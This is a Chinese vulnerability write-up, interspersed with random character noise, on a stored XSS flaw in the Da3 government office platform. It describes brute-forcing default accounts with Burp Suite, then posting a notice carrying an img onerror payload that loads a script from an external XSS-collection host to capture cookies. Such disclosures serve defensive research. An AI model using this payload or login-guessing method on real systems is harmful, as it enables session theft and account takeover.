; J0 S' y$ ?- R1 c
( W7 H+ ]. B' k1 _" } 同联Da3协同办公平台后台通用储存型xss漏洞; S: }( ?3 s3 \% s
- B( t9 \" C) s0 d
, s" |! }) L5 q) f" H& Y 平台简介:
* R- M4 b9 ?2 ^2 r" D
6 Q1 `# Y1 f; k% q1 e9 u: K
; `' [5 v t1 u. k, d
% g' R& [& i( r7 ?1 M( n
: M2 \9 @4 V: z+ X* I' X
7 y, g7 l/ `# \% X( I* K G* i 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
' {# o0 T5 C" |同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
) i: z, [0 }& v6 q同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
4 ?1 j x+ [4 Q2 r2 y! M5 ~, v
- ]. E8 [6 s E5 G6 B9 H6 A( t ; k9 z2 L: V/ f9 O5 W
& C4 w% M }; c9 Y; ]: @3 [
6 T& x9 P: Q% A ?4 ^ / j3 h/ }& B9 z0 L5 M* j
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:" Z' h2 P: |; l
" t! B: q% d4 c4 V
$ s$ x H& o) B" ^! f $ m5 S5 x0 \% O
, n7 j4 M* {. K3 N8 L+ C/ | 5 { D$ R8 n& t* P6 G: o7 \ W1 U
http://1.1.1.1:7197/cap-aco/#(案例2-)) m' t! d! {' s/ [5 M! T: X
" r) a j6 g+ q3 d- ^4 k
8 ?/ O7 ]# T7 F( ~& c: e; V% f% @ http://www.XXOO.com (案例1-官网网站)
/ _3 A2 a* y" J. v/ W
6 h+ I; `/ ?( [8 T1 X2 g
, L2 k. w' [) p' L 漏洞详情:" z* Q+ U' ?! H7 b
9 Y1 n" d+ @* E) ?3 s: e ) A6 S$ ], @! w" I( f8 I! G4 \4 ]
案例一、: `! ]; g5 Z) u# C6 u* D/ S
- W. ]% l% s' Z1 g6 h. \7 R! ]* Q
1 M" e/ v" _5 N# Q- `+ J+ X/ J" h 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
4 R; ?3 c6 m/ m, [4 u7 m
! s. m1 ] h* L# E* y) J, E+ o2 V
2 F5 s [* _3 q/ a8 l7 e5 j2 h 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: H4 u& J: }! D$ C4 z( q
9 D5 q! l1 |4 d. \
2 g1 t* u9 {: a1 X" ^7 Q7 p
; ~* B- p+ S1 ?2 ]3 L) x
1 B. n- p7 x. `, J7 n
7 g( m- R, _) B; Z( l' Q% o, \ # M/ O6 ~4 C; J
9 g& ~5 [; h+ Q9 ~
# a8 t! f. _2 X/ @ status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: ; p; O# ~4 u T* v; Q5 \! P# m
2 G' g9 W5 r4 J7 Y1 i
6 y, ~5 X, P3 C$ s5 _, N4 ?
( Y1 \4 v) q0 x& n
4 ?* } ^9 q- g5 N+ W, |9 z R( W- Y
: l- ?7 g2 t! o5 U, j5 G * c( ~" z/ F/ {% U
. s# d5 ]; Z. Y: R
0 p0 q3 K9 @/ M, ]0 W3 {+ ]$ X 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
8 @6 M: Z5 v N ?; P& `: G- ?( z ^
. @, ]9 A7 |) E( m) |% T
?$ {: @) k- D) T+ m/ A ; W" z! [6 ?! J! y: U
' l5 h) t/ j- p! A8 N! A
- g7 Q6 ?" V5 Z5 t7 D <img src=x( i3 p1 z# ], b ^, ]1 J
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: " K, W9 g6 w2 D: q5 |2 z: [
8 i; |7 C$ A s8 W" z: r
6 L. a+ E3 x5 z; [. n c5 ~& ] " d# h6 A# s' T" k
: P' M9 W5 p' S4 }/ z
7 C* v- i" L5 z2 j1 x1 j! W2 x( L% a; ~ 然后发送,接收cookie如图:
]0 {8 E I9 D8 ~8 c2 \+ o
* m& W& ]$ l2 v/ V" Z
4 R" y6 f. C& `2 |
5 b$ c$ u ^6 W% y
+ Y4 M6 Y2 @# |& x/ @) V) M! ` 9 i9 z5 S! W2 H
, b [/ K' p4 D( ]
! V3 C9 w- N: Z$ x' x 3 B1 q ^6 x2 M. W, \" R
, f. M$ P2 T2 ~! C
2 J* N6 y1 i; I3 s/ V! Y1 \
4 g9 W" i3 I* D6 K5 [# ~1 W+ O
6 Y# q2 t6 r( k$ c* U1 n" u
2 B4 a8 ^* E+ S ! u* G7 V' ^5 \! G; q F7 ?
; n s( z* H+ ~+ w
2 ]9 G! Z' F) ^2 p! I' l ) Y% H, a& K% y; a( Y
; N1 T5 H1 n2 ~ [5 @2 f6 O
# d/ R) {% d1 N$ @8 `! g# c4 L
" w# ^0 o. q0 ? * n9 v9 O/ T- K2 n3 N- `! \, g
6 V) Q' h# q1 y: ?* Q8 \ - y; O! i/ r* O2 X* N# D* m
案例2、
( G3 X6 e9 G0 i* X
' t8 P9 _' {, L% t8 X2 i2 a* ~
; Z& K9 E- E4 u$ g, d& ~ 前面步骤都一样,下面看效果图:
0 v! C U/ k5 q7 ~6 t; k/ G
+ c( }9 D" \. p$ v; e9 V5 h% ^ - c. L. N% o; q' Y
4 [) i8 J* z' r7 Z2 Q! Z
# D( t7 B Z% [) m* i) b
F* v" {' f+ i9 m4 S. }* }
# y8 t5 C A2 U1 R2 c( v9 \" D
$ `. O9 J) ?9 }! j7 T& R" f$ m
5 e/ q7 Z( x) J$ U: r5 \
0 @; F$ g" K H. E1 q+ V) ]
! ]$ e: C _: K; I
3 u8 X/ O# ^) z6 O4 w 0 f$ H: r) P0 v& `% ^9 I5 y
1 X1 f8 W! A0 r8 z- o2 `1 H 7 h) _9 z( {( O- V D* k0 }
0 P" J3 Y0 H, e$ u0 M/ s, Z, b- G8 o
, ?1 v% E' I& h4 F0 ]7 L0 T6 S' ]
3 ?, X7 s9 K# d : w' o: P: ^: N. k$ r5 {
$ J0 ]% c* |' }$ d! c3 O2 y
' d3 q) y$ x* s: H- V4 M + F8 |2 h1 f& d g5 n
) c4 q" E {0 t. T* V; F/ H
; x, Q5 B8 Y9 r8 j! K 0 x2 k) D. _' g3 a
: C3 {) l0 p& C
. _, E. u6 R2 i: x
+ D" e1 }$ k9 c6 H4 @- v# A: g, g
! I8 U* I, }9 l& U- o